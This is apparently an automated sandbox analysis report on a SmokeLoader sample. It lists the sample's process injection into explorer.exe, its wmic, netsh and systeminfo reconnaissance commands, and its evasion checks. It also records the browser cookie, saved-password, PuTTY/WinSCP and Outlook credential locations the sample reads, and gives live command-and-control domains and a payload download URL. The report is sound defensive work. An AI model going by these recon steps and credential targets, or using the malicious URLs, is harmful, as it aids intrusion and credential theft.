Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv Jump to behavior
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2093256969.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2091336304.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_007355EB cpuid 10_2_007355EB
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\dghchav Code function: GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW, 38_2_004010E0
Source: C:\Users\user\AppData\Roaming\eihchav Code function: GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW, 39_2_004010E0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\dghchav Code function: 38_2_00401360 GetNumberFormatW,CreateJobObjectW,GetModuleFileNameW,GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesA,EnumDateFormatsW,CreateNamedPipeA,SetFileShortNameW,SetProcessShutdownParameters,GetTimeFormatA,GetModuleFileNameW,TlsSetValue,SetVolumeMountPointW,GetEnvironmentVariableA,SetCalendarInfoW,GetModuleFileNameW, 38_2_00401360
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE29224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess, 8_2_00007FF6DFE29224
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_006E2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary, 10_2_006E2198
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the windows firewall
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
AV process strings found (often used to terminate AV products)
Source: FDDB.exe, 00000008.00000003.3479732751.0000021DDD8ED000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000003.3324616797.0000021DDD8E2000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000003.3325925801.0000021DDD91C000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000002.4489409357.0000021DDD8EF000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000003.3326174771.0000021DDD8E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

Stealing of Sensitive Information
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4444, type: MEMORYSTR
Source: Yara match File source: 6.2.3E40.exe.560e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dghchav.5e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.dghchav.5f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.3E40.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.3E40.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dghchav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Remote Access Functionality
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4444, type: MEMORYSTR
Source: Yara match File source: 6.2.3E40.exe.560e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dghchav.5e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.dghchav.5f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.3E40.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.3E40.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dghchav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525244 Sample: 9VgIkx4su0.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 53 nwgrus.ru 2->53 55 calvinandhalls.com 2->55 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 7 other signatures 2->75 10 9VgIkx4su0.exe 2->10         started        13 eihchav 2->13         started        15 dghchav 2->15         started        17 3 other processes 2->17 signatures3 process4 signatures5 117 Detected unpacking (changes PE section rights) 10->117 119 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->119 121 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->121 123 Switches to a custom stack to bypass stack traces 10->123 19 explorer.exe 98 9 10->19 injected 125 Antivirus detection for dropped file 13->125 127 Multi AV Scanner detection for dropped file 13->127 129 Machine Learning detection for dropped file 13->129 131 Maps a DLL or memory area into another process 15->131 133 Checks if the current machine is a virtual machine (disk enumeration) 15->133 135 Creates a thread in another existing process (thread injection) 15->135 process6 dnsIp7 57 187.131.253.169, 50028, 50030, 50032 UninetSAdeCVMX Mexico 19->57 59 nwgrus.ru 190.224.203.37, 49755, 49765, 49776 TelecomArgentinaSAAR Argentina 19->59 61 2 other IPs or domains 19->61 45 C:\Users\user\AppData\Roaming\eihchav, PE32 19->45 dropped 47 C:\Users\user\AppData\Roaming\dghchav, PE32 19->47 dropped 49 C:\Users\user\AppData\Local\Temp\FDDB.exe, PE32+ 19->49 dropped 51 2 other malicious files 19->51 dropped 83 System process connects to network (likely due to code injection or exploit) 19->83 85 Benign windows process drops PE files 19->85 87 Injects code into the Windows Explorer (explorer.exe) 19->87 89 3 other signatures 19->89 24 FDDB.exe 2 19->24         started        27 3E40.exe 19->27         started        29 explorer.exe 20 19->29         started        31 5 other processes 19->31 file8 signatures9 process10 signatures11 91 Multi AV Scanner detection for dropped file 24->91 93 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->93 95 Machine Learning detection for dropped file 24->95 97 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 24->97 33 cmd.exe 1 24->33         started        99 Antivirus detection for dropped file 27->99 101 Detected unpacking (changes PE section rights) 27->101 103 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 27->103 115 5 other signatures 27->115 105 System process connects to network (likely due to code injection or exploit) 29->105 107 Found evasive API chain (may stop execution after checking mutex) 29->107 109 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->109 111 Tries to steal Mail credentials (via file / registry access) 29->111 113 Tries to harvest and steal browser information (history, passwords, etc) 31->113 process12 signatures13 63 Uses netsh to modify the Windows network and firewall settings 33->63 65 Uses ipconfig to lookup or modify the Windows network settings 33->65 67 Modifies the windows firewall 33->67 36 WMIC.exe 1 33->36         started        39 systeminfo.exe 33->39         started        41 conhost.exe 33->41         started        43 17 other processes 33->43 process14 signatures15 77 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->77 79 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 36->79 81 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 36->81
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
187.131.253.169
 unknown Mexico
8151 UninetSAdeCVMX true
190.224.203.37
 nwgrus.ru Argentina
7303 TelecomArgentinaSAAR true
23.145.40.164
 unknown Reserved
22631 SURFAIRWIRELESS-IN-01US true
23.145.40.162
 calvinandhalls.com Reserved
22631 SURFAIRWIRELESS-IN-01US true

Contacted Domains

Name IP Active
calvinandhalls.com 23.145.40.162 true
bg.microsoft.map.fastly.net 199.232.210.172 true
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true
nwgrus.ru 190.224.203.37 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://23.145.40.164/ksa9104.exe true
    		unknown
    http://unicea.ws/tmp/index.php true
      		unknown
      http://nwgrus.ru/tmp/index.php true
        		unknown
        https://calvinandhalls.com/search.php true
          		unknown
          http://tech-servers.in.net/tmp/index.php true
            		unknown